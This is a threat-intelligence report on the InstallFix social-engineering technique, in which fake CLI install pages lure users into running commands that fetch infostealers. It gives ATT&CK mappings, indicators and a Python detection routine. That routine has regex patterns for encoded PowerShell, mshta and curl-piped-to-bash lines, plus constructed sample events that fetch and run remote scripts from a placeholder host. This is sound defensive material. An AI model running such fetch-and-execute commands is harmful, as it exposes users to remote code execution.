Full Report
Threat actors are employing a new variation of the ClickFix social engineering technique called InstallFix to trick users into running malicious commands under the pretext of installing legitimate command line interface (CLI) tools. [...]
Analysis Summary
# Tool/Technique: InstallFix
## Overview
InstallFix is a social engineering technique and a variation of the "ClickFix" methodology. It targets developers and non-technical users by providing fake installation guides for legitimate Command Line Interface (CLI) tools (e.g., Anthropic’s Claude Code). The technique exploits the "curl-to-bash" or "copy-paste to terminal" habit, tricking users into executing malicious encoded commands that download and run infostealers.
## Technical Details
- **Type:** Social Engineering Technique / Malware Delivery Vector
- **Platform:** Windows (PowerShell/CMD), macOS (Terminal)
- **Capabilities:** Credential theft, session hijacking, system reconnaissance.
- **First Seen:** March 2026 (Reported by Push Security)
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
  - [T1566.002 - Phishing: Spearphishing Link] (Malvertising/Fake Docs)
- **[TA0002 - Execution]**
  - [T1059.001 - Command and Scripting Interpreter: PowerShell]
  - [T1059.003 - Command and Scripting Interpreter: Windows Command Shell]
  - [T1204.002 - User Execution: Malicious File]
- **[TA0005 - Defense Evasion]**
  - [T1218.005 - System Binary Proxy Execution: Mshta.exe]
  - [T1027 - Obfuscated Files or Information]
## Functionality
### Core Capabilities
- **Deceptive Impersonation:** Clones legitimate documentation pages (e.g., Claude Code) including branding, sidebars, and links to appear authentic.
- **Payload Delivery:** Provides pre-crafted commands for terminal execution that utilize `mshta.exe` or `curl` to fetch remote binaries.
- **Malvertising Integration:** Leverages Google Ads to rank malicious documentation pages at the top of search results for CLI-related queries.
### Advanced Features
- **Legitimate Hosting:** Uses reputable platforms like Squarespace, Cloudflare Pages, and Tencent EdgeOne to bypass domain reputation filters.
- **Seamless Redirection:** Redirects all non-malicious links on the fake page to the actual legitimate site to minimize suspicion after the initial infection.
## Indicators of Compromise
- **Process Names:** `mshta.exe`, `conhost.exe` (observed as parent/child processes of terminal applications).
- **Network Indicators:**
  - `claude-code-cmd.squarespace[.]com`
  - Additional generic indicators involve Cloudflare Pages and Tencent EdgeOne subdomains.
- **Behavioral Indicators:**
  - Unexpected `mshta.exe` execution triggered by `powershell.exe` or `cmd.exe`.
  - Terminal commands containing base64-encoded strings or direct calls to unknown remote endpoints.
## Associated Threat Actors
- Unknown (Service-based attackers using **Amatera** / ACR Stealer).
## Detection Methods
- **Behavioral Detection:** Monitor for instances where `cmd.exe` or `powershell.exe` spawns `mshta.exe`. Detect "curl-to-bash" patterns connecting to non-standard or newly observed domains.
- **EDR Pattern Matching:** Alert on user-initiated CLI commands that download and execute content from third-party hosting platforms (Squarespace, etc.).
- **Network Monitoring:** Inspect traffic for connections to known malicious Squarespace or Cloudflare Pages addresses associated with "ClickFix" campaigns.
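The behavioral rules above (a terminal spawning `mshta.exe`, base64-encoded command lines, a download utility piped straight into a shell) expressed as a small triage routine over process-creation events. This is an added example, not code from the report or from Push Security; the event field names (`parent_image`, `image`, `command_line`) are assumed Sysmon-style keys and the sample events are constructed.

```python
import base64
import re

TERMINALS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# PowerShell -EncodedCommand and its short forms (-e, -ec, -enc) followed by a base64 blob
ENC_FLAG = re.compile(r"-e(?:nc(?:odedcommand)?|c)?\s+([A-Za-z0-9+/=]{20,})", re.I)
# any long standalone base64-looking token in the command line (heuristic; tune the length)
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{40,}={0,2}(?![A-Za-z0-9+/])")
# download utility piped straight into an interpreter ("curl-to-bash" and its iex analogue)
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget|iwr|Invoke-WebRequest)\b[^|]*\|\s*(?:sudo\s+)?(?:(?:ba|z)?sh|iex|Invoke-Expression)\b", re.I)

def _basename(path):
    return re.split(r"[\\/]", path.lower())[-1]   # works for Windows and POSIX paths

def _decodes(token):
    """True if the token is well-formed base64 (re-pads in case '=' was stripped)."""
    try:
        base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
        return True
    except ValueError:
        return False

def flag_event(event):
    """Return the InstallFix-style indicators matched by one process-creation event."""
    parent, image = _basename(event.get("parent_image", "")), _basename(event.get("image", ""))
    cmd = event.get("command_line", "")
    hits = []
    if parent in TERMINALS and image == "mshta.exe":
        hits.append("terminal_spawned_mshta")        # cmd.exe/powershell.exe -> mshta.exe
    if image == "mshta.exe" and re.search(r"https?://", cmd, re.I):
        hits.append("mshta_remote_url")              # mshta asked to fetch a remote script
    m = ENC_FLAG.search(cmd)
    if m and _decodes(m.group(1)):
        hits.append("powershell_encoded_command")
    elif any(_decodes(t) for t in B64_TOKEN.findall(cmd)):
        hits.append("base64_blob_in_command")
    if PIPE_TO_SHELL.search(cmd):
        hits.append("download_piped_to_shell")
    return hits

# Constructed sample telemetry (not from the report); .invalid is a reserved TLD, payload is benign.
_ENC = base64.b64encode("Write-Output InstallFix-sample".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\mshta.exe", "command_line": "mshta.exe https://installer-placeholder.invalid/setup.hta"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "command_line": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"parent_image": "/bin/zsh", "image": "/usr/bin/curl", "command_line": "curl -fsSL https://installer-placeholder.invalid/install.sh | bash"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Program Files\nodejs\npm.cmd", "command_line": "npm install -g example-cli"},  # benign: official package manager
]
```

Run `flag_event` over each entry of `SAMPLE_EVENTS`: the first three events each return at least one indicator and the package-manager install returns none.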
## Mitigation Strategies
- **Prevention Measures:** Train staff to avoid copying commands directly from third-party sites. Enforce the use of official package managers (npm, brew, pip) only from verified sources.
- **Hardening:** Block or restrict `mshta.exe` and `conhost.exe` execution if not required for business operations.
- **Browser Protection:** Use browser security tools that can identify cloned sites or "scatternet" infrastructure used in ClickFix attacks.
## Related Tools/Techniques
- **ClickFix:** The parent social engineering technique involving fake "Fix It" buttons in browsers.
- **Amatera:** The specific infostealer (based on ACR Stealer) frequently delivered via this method.
- **ClearFake:** A similar social engineering framework for delivering malware via fake updates.